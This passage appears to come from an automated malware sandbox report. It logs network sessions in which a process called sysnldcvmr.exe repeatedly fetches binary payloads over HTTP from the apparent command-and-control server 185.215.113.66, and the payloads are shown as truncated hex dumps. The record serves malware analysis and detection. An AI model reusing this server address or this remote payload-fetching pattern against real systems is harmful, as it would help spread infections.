81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED] Data Ascii: Eqn7n%v u&PUK:PXwj>?hr"BH+<_i@Ft(sIe0al.BM_$"o665&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b\|HyW9>Sgx%2S\4`zG
Dec 5, 2024 17:34:58.674704075 CET	224	IN	Data Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81 Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw\|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}
Dec 5, 2024 17:34:58.674715996 CET	1236	IN	Data Raw: 8e eb 48 af 17 20 f3 16 45 0f f6 22 35 c5 47 84 c8 5b 9b ee 41 dd f5 91 39 f3 5c 27 78 dc 89 5a 98 4c 55 f0 96 f5 fd d2 27 30 c9 c1 9c 4f 8a 19 5d 66 85 2e 53 48 0e bb 87 e6 03 96 ed 01 cf db 1e ee c2 0e 9c c2 bf 84 7a 76 5f 0d f6 e3 4a 9c ce d1 Data Ascii: H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>G0(}+RnFjvU4K">;9(jX4^(5h#m^wy5^
Dec 5, 2024 17:34:58.674771070 CET	1236	IN	Data Raw: 8c ad 39 5f 58 c9 04 23 39 ec 60 3c db 9f 60 38 08 31 31 4d 45 c1 45 43 90 19 4d e5 9d 5f 62 4f b3 6a 32 80 6a de 8d c9 d4 01 a1 80 76 bc 76 ed ab ed af e1 3b 29 c3 29 9e da 8d fe 18 7a 34 82 36 a8 a6 01 57 dc 46 37 89 7a 1f e7 63 fe 91 08 4d 4f Data Ascii: 9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'\|:.o85>$=-Lbypf)u>nss<y:e0lE#!)D\|.GkN
Dec 5, 2024 17:34:58.674783945 CET	1236	IN	Data Raw: e0 3a 4a 02 85 f5 a4 03 2f 65 b6 dd da 02 55 5c 65 70 1b ad 08 16 a9 67 57 4b d8 14 84 0a 9c b4 63 15 da 40 cb e9 ff 65 be 96 0c 72 59 37 bd 3e bf 28 9c f1 f9 0c 66 35 61 40 a3 60 92 2f 0b 32 fc 15 9a 0d 42 b5 76 e1 28 e0 86 4d 7d 4a bb c2 e4 5e Data Ascii: :J/eU\epgWKc@erY7>(f5a@`/2Bv(M}J^!P8XG+oP,8Jp$U%-I<x[^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%
Dec 5, 2024 17:34:58.674797058 CET	1236	IN	Data Raw: a7 97 2e b5 88 41 8f e6 27 86 3d 2b 9a 04 17 99 97 3c 83 9e 6e 53 eb 63 6f dd 7a fd f7 95 25 4a d0 ed 3d c9 5a f3 ad a3 e8 ce 16 05 83 20 3e 21 4a a5 75 41 19 f3 0e 03 68 57 7a 03 4c dc 8b fc 38 5c 2d 02 df 55 1d 64 dd 7e 11 db 81 a9 ec 3a 0c 25 Data Ascii: .A'=+<nScoz%J=Z >!JuAhWzL8\-Ud~:%-7&=v66QWdd6">%0#ys#-4ZdWM"D\`-4)@Zl9I<M`XkUsRU7ZAWqff <>j+Sh.
Dec 5, 2024 17:34:58.674809933 CET	1236	IN	Data Raw: 2d 92 e5 ea 8d 23 8f e0 00 6c 7d 10 e3 13 f8 ef 45 26 51 dc c2 0f 14 46 bc 26 0b e6 f5 a1 0c 74 57 0d 28 46 e0 c0 04 7f 7a 4a 2d be 4e 55 20 53 1d 5f f8 f4 4b 0d ca 73 46 8e 30 6e 42 d8 8c cc 64 1e 6b 15 ab 17 e0 c4 b5 5f a6 8c 3f ba d0 cf ee 4c Data Ascii: -#l}E&QF&tW(FzJ-NU S_KsF0nBdk_?LVmTe0.1\|8]0siWQs8`x)2@hLd'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA
Dec 5, 2024 17:34:58.675005913 CET	1236	IN	Data Raw: d0 25 58 e9 40 e0 b3 ab 33 7c 5f f4 c4 4d 1e 7c a8 03 37 48 c8 fd c8 54 d5 df 0a 97 bf 5d 05 11 40 b4 d9 a8 8d f0 91 06 ac 98 60 35 56 95 c9 18 1a 37 cd 06 40 d6 01 c8 87 13 dd 7a d9 02 f9 5b 3f c7 ea df f2 3b 8a d5 3b 41 f9 25 c6 8b b0 1d 1a 6d Data Ascii: %X@3\|_M\|7HT]@`5V7@z[?;;A%mG{Ll70{Tw(g(]NbJ]%abb.R.EZbPQX"7W/*^[oDM18xmy'/a=whQ`YvE9IjPw5Hx
Dec 5, 2024 17:34:58.675019979 CET	860	IN	Data Raw: d0 cf b6 a4 4a 49 2e d7 2f e4 f4 db fd 78 18 df 11 2f 17 d6 41 9a 37 dd 5c 5b 0f 17 8c 6d 98 10 47 1b fa 8f 9c 80 b9 30 ff ab 2d f7 5b 8a 98 ed af 61 e3 ec e8 67 94 61 d4 e0 41 67 4a 3b bf b6 19 da b6 71 98 d7 14 ed af f8 fe 2b aa c7 aa 45 0e 40 Data Ascii: JI./x/A7\[mG0-[agaAgJ;q+E@@B+{kOp4FXZ]:+k![1=8IO\|*G&AJflGK%#\uP<)X/l\|H_uQ<?:)yfdQaYx#+pMAn22Q ^tN\Xc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.11	50063	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:00.986381054 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:02.359956026 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:02 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Dec 5, 2024 17:35:02.359975100 CET	124	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>
Dec 5, 2024 17:35:02.360426903 CET	1236	IN	Data Raw: 2a a9 81 d6 fd 42 20 61 77 b3 e1 96 27 26 69 a5 a5 fd 12 45 e7 70 8e 52 61 02 17 bc a9 fa 4d a1 ea eb 5a fb ad a9 7c e3 d6 09 c7 bf 33 87 46 cc 6b 3c ed 6c d3 51 3b fe c7 be d3 12 b7 d8 47 62 86 b4 a5 12 50 1b 06 4d 8c ed 6c 18 68 d3 b2 17 e9 35 Data Ascii: *B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QKh.([gXC~Slm7lg0hd7NnyM8%Qf7\|VbF9?gk{is6u_pi!
Dec 5, 2024 17:35:02.360477924 CET	1236	IN	Data Raw: 4b dc 75 22 a9 31 18 da 58 da 9c 5b 38 49 62 0f b2 64 bd f8 00 b5 79 6d 2d 2a c5 7c 0a c5 a7 e9 1e a3 fd 06 2b 0f de a6 3e 61 08 18 aa 60 84 ce 3c fb 5a cc 21 25 12 f9 d9 17 a6 7c 20 a2 34 26 b5 80 dc bc 1c fc 99 e4 5b 2b d1 75 73 4c 5e a1 c3 65 Data Ascii: Ku"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\SAPwDc[8q-!q]c7vp.nnF{<~zdrmXt$8&2c^_E98k-
Dec 5, 2024 17:35:02.360487938 CET	248	IN	Data Raw: 0b 3e 1f 18 b4 22 57 d9 8b 7c 31 98 16 87 ae e9 52 72 6d 5d c2 16 1d 54 31 c6 26 50 53 c5 b3 54 51 99 ab e5 bf ce ab 5a 8a 71 45 74 67 a4 63 0c 5b 55 2a 2c 09 40 f8 fc e9 05 9a 85 93 2b 1f c2 e7 ee b8 e5 f1 4c c2 16 6f c2 52 95 cb 30 72 4d 77 66 Data Ascii: >"W\|1Rrm]T1&PSTQZqEtgc[U*,@+LoR0rMwfu^VUzcie_$eM;Bni,9Y;pz@Elc.}JW>4=\u=F%$%_^R'IK4]x+.i/ qh['3(@
Dec 5, 2024 17:35:02.360698938 CET	1236	IN	Data Raw: b3 98 60 7b c2 fe 18 6e 6c 3b f9 ac a2 de d3 91 55 a0 66 42 35 cf 21 d2 35 e4 39 75 47 bc 4a 30 fd b3 ec 68 e2 05 c4 c5 0d b9 52 96 f9 ee 21 eb 75 28 d5 c0 2a 64 ef c0 3a ab 95 53 65 fa 72 6b 02 d9 89 0d 29 a1 42 a0 92 05 af 99 89 64 03 c4 b2 ec Data Ascii: `{nl;UfB5!59uGJ0hR!u(d:Serk)BdWmlE)Mt9G2?=L{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`Hvn
Dec 5, 2024 17:35:02.360769987 CET	1236	IN	Data Raw: 5d d4 ae 87 4b 4c 5c f5 f8 b1 42 1c 64 40 21 dd a9 b2 1b 90 9c 81 19 71 86 63 c3 42 58 66 10 97 16 6b 3d 84 2a 17 7d 6e 66 0d 82 1c 4b 89 f7 0c b4 fc 57 4c fe e5 46 ad 79 7f 9e 36 a4 b2 71 69 ed a1 f5 ad 6a 09 6a c9 cc 71 82 36 aa fa 62 12 93 06 Data Ascii: ]KL\Bd@!qcBXfk=}nfKWLFy6qijjq6b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkdUDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&
Dec 5, 2024 17:35:02.360780001 CET	248	IN	Data Raw: 15 0a b1 41 8b 4d 2d 18 0d 2f 21 95 f5 2c 5d 7f 02 b3 e1 61 f1 81 14 90 ff a6 59 49 c6 b6 95 e1 52 b6 70 e5 9f b1 d7 6f 16 6f 39 ca 52 7f 6a 8d eb 57 0c 60 75 2d b8 22 aa d4 b9 c2 57 7d 76 34 64 44 38 78 a0 68 d0 a0 44 9b 74 71 55 fa f6 a6 80 b6 Data Ascii: AM-/!,]aYIRpoo9RjW`u-"W}v4dD8xhDtqUl/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKd
Dec 5, 2024 17:35:02.361141920 CET	1236	IN	Data Raw: 1f c2 c0 01 a9 a1 6d 1c 12 79 22 13 1e 59 39 ac 6f ba 33 c7 51 89 42 71 cf 1c 0c 8a a5 b3 a3 8e 59 56 d1 23 1f 09 19 56 72 38 9b 0a 43 a7 37 de 43 6c 55 38 2e 2a 20 8e 0e 09 cd b6 08 2f b5 3b 37 dc 28 bb df 5e eb 88 be 15 b4 5a 53 48 ba 3e 33 d6 Data Ascii: my"Y9o3QBqYV#Vr8C7ClU8.* /;7(^ZSH>3b\hljGkcy`L@&C7W{lxe;c\|<>i+,R:ecIfgIDpU^16gr2g"{Sq#<m0r
Dec 5, 2024 17:35:02.361223936 CET	1236	IN	Data Raw: f5 12 b9 95 02 be ba 75 47 ee c3 6f 92 65 e2 78 09 e4 c1 46 cc f6 1a 2a bb a3 8c 2d 7e 51 f6 94 14 b6 19 09 ee 3b 59 30 f7 6f 71 62 a9 7f 81 06 da ca f3 13 9d 08 c3 db 3d 8f 67 08 aa a4 cf 1e b1 d0 cd dc 50 14 2f 04 2d fd 11 53 e2 ae a4 dc c9 10 Data Ascii: uGoexF*-~Q;Y0oqb=gP/-SeccZ?m_=UVTM'aYv_w&%k"- 1?3ul2'Kus2)^XCO"N"^E]zgh[
Dec 5, 2024 17:35:02.479898930 CET	248	IN	Data Raw: c9 88 00 75 4b d3 b6 be 4d 95 9b 0d 4d f4 17 76 5e fa 2b 9b 0d 20 96 0b b5 51 59 b2 eb 86 49 f2 fd df a5 5f 55 95 cb 16 94 79 43 38 76 1d ea 1d 23 22 0d e0 3d dc cd 3c 89 ff 1c ea 64 59 7a 0c 20 7f 25 9a ba 2e 3a 4f cf b4 fc 36 ca 60 fb 02 2f fb Data Ascii: uKMMv^+ QYI_UyC8v#"=<dYz %.:O6`/Js=vHBjc0nWNl+7AQ5J'uy^X=T?2hVgpk, R^C!oO.^;G@ ;/0#1myu)p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.11	50064	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:04.836057901 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:06.197885036 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:05 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:35:06.197952986 CET	124	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
Dec 5, 2024 17:35:06.201807022 CET	1236	IN	Data Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW\|Sz#0#\|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
Dec 5, 2024 17:35:06.201867104 CET	1236	IN	Data Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
Dec 5, 2024 17:35:06.201877117 CET	248	IN	Data Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
Dec 5, 2024 17:35:06.205334902 CET	1236	IN	Data Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC\|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
Dec 5, 2024 17:35:06.205389977 CET	1236	IN	Data Raw: e3 c7 0b d2 07 66 a2 02 df 9b c5 ad ab 86 33 77 7c 85 cf 8e 02 e9 ff 0a 52 b6 86 0a 21 68 f0 58 ca f5 19 d1 1f 7e eb d9 06 ec 62 12 90 c3 a8 07 cc ab 65 62 96 7c 42 a0 c7 96 0d 36 40 4f ee 7a 37 4c 55 60 da 2d 0c 43 d9 ee 18 23 31 42 c0 08 0f e1 Data Ascii: f3w\|R!hX~beb\|B6@Oz7LU`-C#1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^
Dec 5, 2024 17:35:06.205400944 CET	248	IN	Data Raw: 8b f1 53 ed 23 89 32 81 6a bd ac 31 f6 9e 1b 21 44 9f d0 ec 52 3c e7 1c f1 5f 27 92 ba 55 b5 ac 17 95 c8 e8 2a 81 72 92 e4 d3 9b 75 7a 3a 81 3a 47 c0 9d 6e d4 bb 70 d3 d3 62 2d fc c9 2d a8 43 c5 85 d8 06 4b 95 4d 8f 6a a5 64 23 d1 2f ec 3d 2b 2c Data Ascii: S#2j1!DR<_'Uruz::Gnpb--CKMjd#/=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-dCZ`p7(uiHd=)d3@<
Dec 5, 2024 17:35:06.208853006 CET	1236	IN	Data Raw: 17 43 81 f0 03 28 4e 24 a8 e2 3f 60 47 a1 6f 7b ec 56 d9 24 37 5a 16 c7 eb 35 dc 0e ed 65 da f8 49 f7 cc 2b 36 d8 0f 7d 66 42 a9 b8 85 ec bf 11 2a 77 a0 34 47 30 6f 7f 41 eb 96 c9 07 bc 08 47 23 99 e4 a4 6f f9 66 df 48 58 04 59 25 99 cb 97 2b f2 Data Ascii: C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#ofHXY%+CVFJq0`24NEEGWOI+3C^)^+KBSocNu\QlIj;vw(e7%3P8L97p,#0^4U[D.-Y
Dec 5, 2024 17:35:06.208919048 CET	1236	IN	Data Raw: 5a ac 51 67 01 3a 92 a1 ff f7 16 2a 46 98 21 45 9c 86 aa 78 86 b6 91 f2 e4 79 5a 79 6c ff b8 36 11 0d 46 b5 28 67 4f 17 25 c6 46 1d f0 6e a1 5f 5c 30 a3 52 df 5f d9 a2 ad 4a ff 0f 95 c9 36 8d bf 83 c5 bf c8 e5 47 08 f9 e3 09 7d 86 8c 8b 98 db 6f Data Ascii: ZQg:F!ExyZyl6F(gO%Fn_\0R_J6G}oJ&bBypG`6~!!S'?`?\i#Y%3xZT/qU^bIn/n}JGG-vam2T5a.v"[Fu#!D*
Dec 5, 2024 17:35:06.318001032 CET	1236	IN	Data Raw: 0f b3 d3 05 79 4d 7a a8 6e 58 5a 01 53 d0 02 cb c3 2b 86 63 b6 7f 83 2e eb 0d 93 a1 9d ed 03 12 e4 de 0b d4 1f da f1 2b 75 78 ac 0d d8 d3 d1 37 d3 d4 f5 3d b8 11 26 a3 c7 da 52 4d 50 d2 ae 12 55 a0 a6 f8 4b e6 c8 f4 f8 85 9b 93 57 cb 3a 31 c6 52 Data Ascii: yMznXZS+c.+ux7=&RMPUKW:1RuY[?@b DYSC^b`a85+N="p-1j'`G$hixmdkeym8)\|Sm*7Q%gDUw'P(+P{lC\q"b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.11	50066	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:35:08.470190048 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:35:09.837469101 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:35:09 GMT Content-Type: application/octet-stream Content-Length: 63232 Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT Connection: keep-alive ETag: "67497f08-f700" Accept-Ranges: bytes Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED] Data Ascii: 3-;)VX\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t\|wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
